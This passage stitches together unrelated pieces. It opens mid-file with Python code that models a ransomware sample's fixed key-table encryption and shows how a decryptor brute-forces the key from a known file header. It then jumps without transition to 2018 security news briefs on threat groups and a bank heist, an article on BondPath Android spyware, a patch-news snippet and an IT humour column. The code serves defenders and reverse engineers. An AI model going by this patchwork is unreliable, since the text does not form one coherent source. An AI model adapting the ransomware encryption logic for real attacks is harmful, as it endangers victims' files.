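    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def stream_xor(key, data):
    """Stream-cipher encrypt/decrypt (the same XOR in both directions)."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def ransomware_encrypt(plaintext, seed=None):
    """Model of the malware: pick a random table index, encrypt, and return
    the index that the sample writes to disk next to the victim's files."""
    idx = random.Random(seed).randrange(len(KEY_TABLE))
    return stream_xor(KEY_TABLE[idx], plaintext), idx


def decrypt_with_index(ciphertext, idx):
    """Recovery path of a decryptor: read the locally saved index and look the
    key up in the table extracted from the binary."""
    return stream_xor(KEY_TABLE[idx], ciphertext)


def recover_index(ciphertext, known_prefix):
    """Without the saved index, brute-force the table using a known file
    header (e.g. b'%PDF-1.4' or b'PK\\x03\\x04').  Returns the first index
    whose keystream decrypts the header correctly, or None."""
    head = ciphertext[:len(known_prefix)]
    for idx, key in enumerate(KEY_TABLE):
        if stream_xor(key, head) == known_prefix:
            return idx
    return None


if __name__ == "__main__":
    doc = b"%PDF-1.4 constructed sample document body"
    ct, saved_idx = ransomware_encrypt(doc)
    assert decrypt_with_index(ct, saved_idx) == doc
    print("saved index:", saved_idx, "recovered by header search:",
          recover_index(ct, b"%PDF-1.4"))
```

The point for a defender or reverser: a key space of 1,000 entries is not a key space, and storing the selector next to the ciphertext removes even that. The same brute-force approach works for any fixed table once it has been pulled out of the binary.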

Urpage Threat Entity Connected to Other Threat Groups (08/29/2018)
Trend Micro's researchers have studied "Urpage," a new threat actor that shares similarities with the Confucius and Patchwork threat entities. Urpage is targeting InPage, a word processor for Urdu and Arabic languages and uses various malicious techniques, including backdoors, iOS malware, downloaders, and more.

Cybercrime – W/E – 083118

Google Warns Senator's Office of Phishing Emails (08/28/2018)
Google warned Senator Pat Toomey's office that nation-state hackers sent phishing emails to old campaign accounts, the Associated Press (AP) reported. Steve Kelly, a spokesman for the Pennsylvania senator, said the accounts that were phished were considered dormant and had not been used since the end of the 2016 campaign. Toomey is currently in office, and the attacks would not have affected the midterm elections. Google suggested that the phishing emails were only seeking information, as they did not contain links to malware.

Iranian Threat Group "Cobalt Dickens" Attacks Universities in Various Nations (08/28/2018)
SecureWorks researchers discovered a URL spoofing a login page for a university. Further research into the IP address hosting the spoofed page revealed a large credential-theft campaign: sixteen domains contained over 300 spoofed Web sites and login pages for 76 universities located in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the US. Because the activity uses the same tradecraft as Cobalt Dickens, a group with ties to the Iranian government, SecureWorks believes the two are one and the same. Cobalt Dickens previously attacked universities, using stolen credentials to swipe intellectual property from library systems.

Possible Iranian Operation Using Network of Fake News Sites to Influence Audiences (08/27/2018)
FireEye has identified a suspected influence operation that appears to originate from Iran aimed at audiences in the US, UK, Latin America, and the Middle East. This operation is leveraging a network of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests. These narratives include anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as support for specific US policies favorable to Iran, such as the US-Iran nuclear deal (JCPOA). FireEye suspects that the operation is Iranian in nature due to site registration data and the linking of social media accounts to Iranian phone numbers.

Report Suggests Lazarus Group Was Behind Indian Bank Heist of $13.5 Million (08/28/2018)
Researchers at Securonix uncovered details regarding a cyber attack targeting the SWIFT/ATM infrastructure of Cosmos Bank, a 112-year-old cooperative bank in India and the second largest in the country, resulting in a loss of over $13.5 million USD. According to the analysis, the hackers first gained a foothold in the banking network and then used it to fully compromise the bank's internal and ATM infrastructure. The attack involved multiple targeted malware infections followed by the setup of a malicious ATM/POS switch, which hijacked connections between the central switch and the Core Banking System. The attackers then adjusted the target account balances to enable withdrawals. Securonix attributes the attack on Cosmos Bank to the North Korean-sponsored Lazarus Group.

New BondPath Android Spyware Retrieves Chat Data From Messaging Apps

Researchers uncovered an Android spyware family called BondPath that is capable of retrieving chats from several mobile messaging apps while spying on other types of information.

BondPath has been around since May 2016, but in July 2018, researchers at Fortinet observed that some samples were still in the wild. Those specimens masqueraded as “Google Play Store Services,” an application signed by an unknown developer known only as “hola.” The name of this malicious application is intentionally similar to Google Play Services, the title of the process Google uses to update Android apps from the Play Store.

Upon successful execution, BondPath gains the ability to steal an infected device’s browser history, call logs, emails and SMS messages. But a few less common capabilities made BondPath stand out to the researchers, such as its ability to monitor an infected smartphone’s battery status. It can also steal chats from WhatsApp, Skype, Facebook, Line and other mobile messaging apps.

The Rise and Fall of Spyware

According to Verizon’s “2018 Data Breach Investigations Report,” spyware and keylogger malware were involved in 121 security incidents and 74 data breaches in 2017. This threat category increased its activity during the second half of 2017 and the beginning of 2018, yielding a 56 percent increase in detections during the first quarter of 2018, according to Malwarebytes. Spurred in part by a series of large attack campaigns pushing Emotet, Malwarebytes named spyware as the top detected business threat for the quarter.

Near the end of the first quarter, spyware activity declined significantly. It continued falling throughout the second quarter, ultimately decreasing by 40 percent, according to Malwarebytes. In that span of time, TrickBot was the most prevalent form of spyware after it added the ability to hijack cryptocurrency earlier in the year.

How to Protect Against Mobile Threats

To defend their organizations against BondPath and similar mobile threats that originate in official app stores, security teams should keep applications and operating systems running at the current patch level, verify the legitimacy of unsolicited email attachments through a separate channel, and monitor their IT environment for the indicators of compromise (IoCs) listed in the IBM X-Force Exchange threat advisory.

Sources: Fortinet, Verizon, Malwarebytes, Malwarebytes(1)

The post New BondPath Android Spyware Retrieves Chat Data From Messaging Apps appeared first on Security Intelligence.

Windows and .Net finally get their ‘D Week’ patches, as Intel microcode fixes go wacko

Time for the final August patching shoe to drop.

Late last night Microsoft released a flurry of patches, posting them on the Microsoft Update Catalog. Some are available through Windows Update, some aren't.

As of early Friday morning, the Win10 patches are not available through WSUS, the update server service. It’s not clear if that’s a mistake, a hesitation — or if somebody just went home last night and forgot.

Let’s hear it for patching predictability. And transparency.


You’ve got malware!

Flashback to the early 2000s, when this non-IT pilot fish works in a building where the level of computer literacy is hovering near absolute zero.

"I was the only person in my department who had any computer skills at all," fish grumbles.

"One day we all got an email notice from management about a virus that was going around, spread by email. We were warned about clicking links and opening pages and all the other standard warnings."

Fish suspects that most people in the department will just delete the warning, since they don't use their computers for anything but the bare minimum required by company business -- and they barely understand even that.
